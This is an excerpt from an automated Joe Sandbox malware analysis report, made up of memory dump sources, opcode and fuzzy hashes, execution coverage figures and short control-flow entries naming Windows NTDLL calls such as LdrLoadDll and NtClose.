                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6aadd649940960d35067f6d78de28a11a8ffaa6982f27bf86c3c45019d4439e2
                      • Instruction ID: 2aea9186c1287b80e3d27fee6ad0e079cb4ba0782051e3627a8941f0b56ee0fb
                      • Opcode Fuzzy Hash: 6aadd649940960d35067f6d78de28a11a8ffaa6982f27bf86c3c45019d4439e2
                      • Instruction Fuzzy Hash: 72419EB4E2521ADFDB44CFAAC984AEDFBF2BB09200F509425E416F7210D7349951CF14
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328296626.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ffd000_03.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328345776.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_100d000_03.jbxd
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ab6698cc9a6fa3981ef9c67a3a11871128019d18dc0b0c642a195f7b0f9a8bed
                      • Instruction ID: bef3c4ee1c1a4897736182a96801329e2b68cc525e17ace6fe29ddd7d6c4ea95
                      • Opcode Fuzzy Hash: ab6698cc9a6fa3981ef9c67a3a11871128019d18dc0b0c642a195f7b0f9a8bed
                      • Instruction Fuzzy Hash: 0DF08B7235074A8BC3148A2AD81061FFBDFEBC52A0B89C83BD105C3250EA34D9128680
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328296626.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ffd000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 424efb4a4996385e133a5c31aceae700b36518dc4bea2b460754790f8e00e986
                      • Instruction ID: 54b700d38d11eecf97a859e4a28eccb934e8f5f16b856cdcf7453be897b02a77
                      • Opcode Fuzzy Hash: 424efb4a4996385e133a5c31aceae700b36518dc4bea2b460754790f8e00e986
                      • Instruction Fuzzy Hash: 01F062724053449FEB209A16DD84B62FBE8EF51735F18C45AED084F2A6C279AC44DAB1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 093cb287543c6b83d8ecb0690cfcafa3f7ce3b019203e61ec224ea61acac4b91
                      • Instruction ID: 50738edb7cc429491692bd928c2c8ff64eec05ed22368708415d54a7e1702c11
                      • Opcode Fuzzy Hash: 093cb287543c6b83d8ecb0690cfcafa3f7ce3b019203e61ec224ea61acac4b91
                      • Instruction Fuzzy Hash: 4DF028B0D38249CFDB5ADBA8D4007ADB77DBF49301F018635910567355CBB045018B52
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3d8012a3adb83186ff51875a209895e142340ac2541d06b3427d50e7418e231e
                      • Instruction ID: 499a3283b17f3e8fd7d1e149bb4e687f90cecc7bec39e7d4c794c5d276f1e218
                      • Opcode Fuzzy Hash: 3d8012a3adb83186ff51875a209895e142340ac2541d06b3427d50e7418e231e
                      • Instruction Fuzzy Hash: C1F0E231B102295FDB585A2ACC0669FBAEBABC83A0F04453AE501D3395DFB4982286C0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0f5705025fb561e5ffc056aa2570a56c26e1335a0b7bcba9cdf8abfbf6bdfbb0
                      • Instruction ID: 65485fd8bd296309e1d19dd95b1003ad9f361f5f8750f9785ba4f18c88f65c54
                      • Opcode Fuzzy Hash: 0f5705025fb561e5ffc056aa2570a56c26e1335a0b7bcba9cdf8abfbf6bdfbb0
                      • Instruction Fuzzy Hash: C1F0A7317302255F8B24BB7D9418A6A77FADFC86613244476E609C7351DE71CC018791
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 60fb8231c0368a7b73210221411373f057b35112e06905fa6581e64a53086064
                      • Instruction ID: 90c73ab661d578722e7fdc723ded478445428a1ec5938c45e2e731d27aec83c0
                      • Opcode Fuzzy Hash: 60fb8231c0368a7b73210221411373f057b35112e06905fa6581e64a53086064
                      • Instruction Fuzzy Hash: 0001E8B081021BDFDB14CF6AC4047AEBAF1EF48360F208229E925AA2A0D7754A40CBD0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a26bc4499c4086ea35184d9a868e3df53562f74974e8746b3574cf595adf3f6e
                      • Instruction ID: 18f51a951afe9c6ed26e8f9d97a48540f10a0bc3759747c4b0339c8abeabf92e
                      • Opcode Fuzzy Hash: a26bc4499c4086ea35184d9a868e3df53562f74974e8746b3574cf595adf3f6e
                      • Instruction Fuzzy Hash: 45F0547132075A87C3149A2BD81441FF7DFFBC53A1745C83BD109C7114EB70D9114690
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 83b5b7c001ff99f0def85603ad633b3bf8f71cc3fe403289bcfadd20eb2eef77
                      • Instruction ID: f39b055d1989d6f6636bd890e003e31aeca155ccee16c659aa39d45392a869d7
                      • Opcode Fuzzy Hash: 83b5b7c001ff99f0def85603ad633b3bf8f71cc3fe403289bcfadd20eb2eef77
                      • Instruction Fuzzy Hash: 0CE039B27002286F93049AAEDC84D6BBBEEEBCC770311807AF908C7324D9319C0096A0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a70ddbe31bfc5951f62f0e0d92eb8a9965276379621132dd3e531cda6d25a029
                      • Instruction ID: e9c28ecc7cc01eeab6bf22c3031418f4be0974595dfcb98640fa9311518fc983
                      • Opcode Fuzzy Hash: a70ddbe31bfc5951f62f0e0d92eb8a9965276379621132dd3e531cda6d25a029
                      • Instruction Fuzzy Hash: AFF02772608109AFDF05CF68DC4199EBFBAEF05210B04C1BBE104D7361E630DA10C714
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 680edd0ae9d889847e820c5158992f9b1dde6f573e9c845c69dec7d3afcd0471
                      • Instruction ID: 7a2a05892060d86e2bfc5a29433ec3d6958fa34f984458d43ac55e9e3b3a0a87
                      • Opcode Fuzzy Hash: 680edd0ae9d889847e820c5158992f9b1dde6f573e9c845c69dec7d3afcd0471
                      • Instruction Fuzzy Hash: 6CE092327406281BE71897AA9C0276B7BDADBC8730F14C42DA519D7385C928BC0246D4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ccde15671c45356e67528095cc0e4ae99c376ca625643b40b1cbddbb951ab2d8
                      • Instruction ID: 0f24c44a734f39d3182b89d9c15c45d6db2263b22750cbe2537a066dfdd41ab9
                      • Opcode Fuzzy Hash: ccde15671c45356e67528095cc0e4ae99c376ca625643b40b1cbddbb951ab2d8
                      • Instruction Fuzzy Hash: EDE0D8713901144FC384E769E855B4637E9DB886207108465F405C73D6DE28DC024BE0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e867a0c796bd5a546ab77fc133d86a09643b588428e1e75fa7f9e12bdeeb9f1b
                      • Instruction ID: b3b5e238042cac11f0b050b03dc2dbe1c11dbc68081688a24100b4548da29145
                      • Opcode Fuzzy Hash: e867a0c796bd5a546ab77fc133d86a09643b588428e1e75fa7f9e12bdeeb9f1b
                      • Instruction Fuzzy Hash: ECF015F4D29208EFCB04DFB8D004AADBBB5EB0A301F0081AAE90893310D7759A40DF41
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1e358ec8a1b8fb61a94fc7c7f75d9d095e83aa7420c54bc18872b94989ded992
                      • Instruction ID: 75c7af1e31672a5cb34d527370646601c3ccd0d66c9644ecb1b9e3764bfc6e60
                      • Opcode Fuzzy Hash: 1e358ec8a1b8fb61a94fc7c7f75d9d095e83aa7420c54bc18872b94989ded992
                      • Instruction Fuzzy Hash: FEE0D8BB424315CFF751EB68D8A5B8CB7A19ED0305B059467C1548B133D591C08CD7CB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 465c4d01bc242b819ab0bd3384924c48318736a17213a741041f613336a57f19
                      • Instruction ID: 2eb6ff81797acc7610cfb4182fc149f6844823e8bc38fe1ad6a5d7762e30d639
                      • Opcode Fuzzy Hash: 465c4d01bc242b819ab0bd3384924c48318736a17213a741041f613336a57f19
                      • Instruction Fuzzy Hash: BDE0863270065857E61497AB9C00B27BBDFEFC9B20B14C069A51993344CD607C0186D4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9042e5e0c9eb126f0d889846493eb207b56724017c069978c0de9682c4be031b
                      • Instruction ID: 3cf33dee2b9422be576ffe8206f2eeb5c683ead354e6d5396fb0afd1c03e24f0
                      • Opcode Fuzzy Hash: 9042e5e0c9eb126f0d889846493eb207b56724017c069978c0de9682c4be031b
                      • Instruction Fuzzy Hash: CDF01574E0020CAFCF44EFA8D80469DBBB5EB48300F1081AAE904A3350D7345A50DF41
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6ff401fa084358df51f647bf2204918922e9ebe69862afc48f08d66d2bb6e642
                      • Instruction ID: a0d7f7fb564ebdbdf344e8420d494686c98c8c6bc422d441a22d0336d91618cd
                      • Opcode Fuzzy Hash: 6ff401fa084358df51f647bf2204918922e9ebe69862afc48f08d66d2bb6e642
                      • Instruction Fuzzy Hash: 96E0CD717505144F8384FBB9E444A0677FAEF8C520310C465F909C7355DE30DC018BD0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a1cd2e30549bb11e40c6dd6c7768d28dd1d7e90e7e28832a1a220d0dbb592ae
                      • Instruction ID: 66fcc7bed0f3e95b3b0694aba77be64b7b4cb528c1b9e7bff2bdd4c333efbd37
                      • Opcode Fuzzy Hash: 2a1cd2e30549bb11e40c6dd6c7768d28dd1d7e90e7e28832a1a220d0dbb592ae
                      • Instruction Fuzzy Hash: BFD05EB1E380089FC7009AA5E8448EDFB70E78F212F005436D212E3110E3701424CA88
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5533d686a340eea8b50329cf10e2e8c7d6e5ee14b46a52c5710d5a8e22a80cd7
                      • Instruction ID: 3b6ab4b373bdbe5e45aaaef1bb0533f1cf2bfd4253764c8a4ddd6aad4e6f611a
                      • Opcode Fuzzy Hash: 5533d686a340eea8b50329cf10e2e8c7d6e5ee14b46a52c5710d5a8e22a80cd7
                      • Instruction Fuzzy Hash: 38D012710643888FC7114BB0F99E12E7F31AA57216B24AD9AE898C6071CA2145438740
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 78aa99ba6a30d9ca3aef53607dcab94516584eed90c3cd8f032e51c84e5aa94f
                      • Instruction ID: d03181eb05805d492707c7f39f69073e916b013113e2c53f43613d39f81a4037
                      • Opcode Fuzzy Hash: 78aa99ba6a30d9ca3aef53607dcab94516584eed90c3cd8f032e51c84e5aa94f
                      • Instruction Fuzzy Hash: 42D0177286021D8FCF46DBA8CA8246EFB36BF89200B549916A0017B655CAB1EA119F85
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e61cf71f336e3c761bf494c67946bc0ebef4d254b08a65bc199c1f11e05c9977
                      • Instruction ID: dac869e6acde9b917250aaa5300d8e7bdacbf635f7f23309c9608112268e9df0
                      • Opcode Fuzzy Hash: e61cf71f336e3c761bf494c67946bc0ebef4d254b08a65bc199c1f11e05c9977
                      • Instruction Fuzzy Hash: CFC08CB00746088FE61427A8A80D32CBB79A70220AF042A31E50C01020CF700050C755
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: af3d79aa5bb0b3ef02dbeca100e747435b77619ceae2456f63182c2060e798a2
                      • Instruction ID: 73069e8597e8c5c01517dbb2c062f0a571d182b9d9b709589323899570a538e6
                      • Opcode Fuzzy Hash: af3d79aa5bb0b3ef02dbeca100e747435b77619ceae2456f63182c2060e798a2
                      • Instruction Fuzzy Hash: E5C08C7B1100428FE3076B04C802F00B965FF90308F08C0A4E050CA022CA26C032AB01
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b54a7bd114b6f55b964fea7dfd53e2b05383bbc1f5e42e52ebb8df6a0fb1b9fa
                      • Instruction ID: ca813c2b4c61e5c71b8b615d46a926013b4fcb887c4cefb6360cc85cdf0244ce
                      • Opcode Fuzzy Hash: b54a7bd114b6f55b964fea7dfd53e2b05383bbc1f5e42e52ebb8df6a0fb1b9fa
                      • Instruction Fuzzy Hash: 9DD0E974D28209CFCB40DF95D5555ADB7B5AB49301F205415D51562240C77469528F40
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cfa81556545efa69b2f1b7908ca9248e6c68fafc2a68db233d2e14fae5383c4a
                      • Instruction ID: 5a7df10b2dcd0e4756913e5e0229cb3e42e7661c9b7ec8486dd9f8adfca1875e
                      • Opcode Fuzzy Hash: cfa81556545efa69b2f1b7908ca9248e6c68fafc2a68db233d2e14fae5383c4a
                      • Instruction Fuzzy Hash: DAB012B52B4704E7900123744CD0A2FF650EBB7701FC0AD26B70700180C4714424921F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f4163fdb1746fc67509ceaee25dd6a2024784c55f947696b6f07e43ea3ab8e0
                      • Instruction ID: 7ab1f3f2d375b1740af6f4562239dd9554efa8741d992f637650720fd787f2f8
                      • Opcode Fuzzy Hash: 8f4163fdb1746fc67509ceaee25dd6a2024784c55f947696b6f07e43ea3ab8e0
                      • Instruction Fuzzy Hash: 6EC08C70220200DFCB11CB90C24446ABBB3FF082167200428E00212210C731FC01CF00
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2544edaf4f2f13352831bbc62fcad8a09b4e510ab5fed177d6c482b52cf58c2c
                      • Instruction ID: 7443230f6820655a5f67e2119699d32dfb17c62aeabe521f5598eb119a055aa4
                      • Opcode Fuzzy Hash: 2544edaf4f2f13352831bbc62fcad8a09b4e510ab5fed177d6c482b52cf58c2c
                      • Instruction Fuzzy Hash: BAC09B71D34128D7C384E7B4D940C5CF3E1BA457007404A3A4105560A6C6606D195745
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a9b51129acca0bf151fc8b14fab82d2c70bdabb9f78e124ca289e73eddf542f3
                      • Instruction ID: 912f9d5a70595f834ba75307af94339adebfab2bf9a8f3fca42da4746e3baca6
                      • Opcode Fuzzy Hash: a9b51129acca0bf151fc8b14fab82d2c70bdabb9f78e124ca289e73eddf542f3
                      • Instruction Fuzzy Hash: 57A011ABC002A202CA802008CEE23880AB0A3A0220FC82080C0808A2A2F03882082222
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f15b8bbd4377a1b45e92abc43433153373d9182b6cc4d81504b5bccfaf8d46c9
                      • Instruction ID: d6d8e3ebe6dd8580e19b9b039ed5fd4142a16f584e6e41d280b2957574f33e42
                      • Opcode Fuzzy Hash: f15b8bbd4377a1b45e92abc43433153373d9182b6cc4d81504b5bccfaf8d46c9
                      • Instruction Fuzzy Hash: 4DD10A3192075A8BCB01EBA4D890AD9F7B1FF95310F50DB9AE50937261EF706AC4CB91
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a323b6579dded27f7bac97f13622ca44707319b344eb346c0f17d241988c0bc6
                      • Instruction ID: 86d786c250f933a8d031b19508589facb2b126a8555bdc10f122f400fb5a6fd2
                      • Opcode Fuzzy Hash: a323b6579dded27f7bac97f13622ca44707319b344eb346c0f17d241988c0bc6
                      • Instruction Fuzzy Hash: 1DC125B88207458BE721CF25F85C2897BF1BB8532CF504309D2616F2E9DBB9145ACF54
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0d83d54846d3e66ea03285d7b1f17a3c23b5d9bfa7de5246a60017c74c9f84e2
                      • Instruction ID: d3169903757e72cee0fa86963a6930ab74bcaf1f0f6f00b3d1ab684fe44faa62
                      • Opcode Fuzzy Hash: 0d83d54846d3e66ea03285d7b1f17a3c23b5d9bfa7de5246a60017c74c9f84e2
                      • Instruction Fuzzy Hash: 0051FC75E002198FDB18DFA9C5805AEFBF2FF89305F24816AD518AB315D7319A41CFA0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7dcde9ec80474d96989ad4ac5e328d4b0132422bbe5a16a734918e56c60cfc99
                      • Instruction ID: 10b1f60b496fbd60f18ae57cea3f0d55389ba0416c0160851d02c39c7edbc498
                      • Opcode Fuzzy Hash: 7dcde9ec80474d96989ad4ac5e328d4b0132422bbe5a16a734918e56c60cfc99
                      • Instruction Fuzzy Hash: E541C271730609CFC710CA69C485A5AF7F6EF85350F84843AD25ACB664D274EA61CF41
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 10856a84b09b0a2e047d28f64a5f827203c5959c696ed5781837a8eabecae556
                      • Instruction ID: 01b7e0bf65fa776fc1464c5035ea690a461c9b673de858616c0f7596f02d7817
                      • Opcode Fuzzy Hash: 10856a84b09b0a2e047d28f64a5f827203c5959c696ed5781837a8eabecae556
                      • Instruction Fuzzy Hash: A541C471730609CFC714CB69C885A5AF7F6EF85350F84843AE15ACB660D274E961CF41
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dfc6ea262516d6175dfc46ff50fc01a33ce46ccd59ca6cf3a17bd445c445debd
                      • Instruction ID: f3515736bcbd42168cab5572e4e0487cdc7628329398b9c7e46d3d90aa07ede5
                      • Opcode Fuzzy Hash: dfc6ea262516d6175dfc46ff50fc01a33ce46ccd59ca6cf3a17bd445c445debd
                      • Instruction Fuzzy Hash: 98C04C1ED8E414E58528598A64405FCE7BDD2DB127F817561C30EA258195318125D548

                      Execution Graph

                      Execution Coverage:1.1%
                      Dynamic/Decrypted Code Coverage:4%
                      Signature Coverage:6.7%
                      Total number of Nodes:150
                      Total number of Limit Nodes:14

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 47 417e63-417e7f 48 417e87-417e8c 47->48 49 417e82 call 42e433 47->49 50 417e92-417ea0 call 42e953 48->50 51 417e8e-417e91 48->51 49->48 54 417eb0-417ec1 call 42cdf3 50->54 55 417ea2-417ead call 42ebf3 50->55 60 417ec3-417ed7 LdrLoadDll 54->60 61 417eda-417edd 54->61 55->54 60->61
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417ED5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 91 42b863-42b89f call 404a33 call 42c903 NtClose
                      APIs
                      • NtClose.NTDLL(004246E4,?,00009E5D,E5B4FE69,?,004246E4,E5B4FE69,?,?,?,?,?,?,?,?,00000000), ref: 0042B89A
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 105 1772b60-1772b6c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 107 1772df0-1772dfc LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 106 1772c70-1772c7c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 108 17735c0-17735cc LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0

                      Control-flow Graph

                      Strings
                      Memory Dump Source
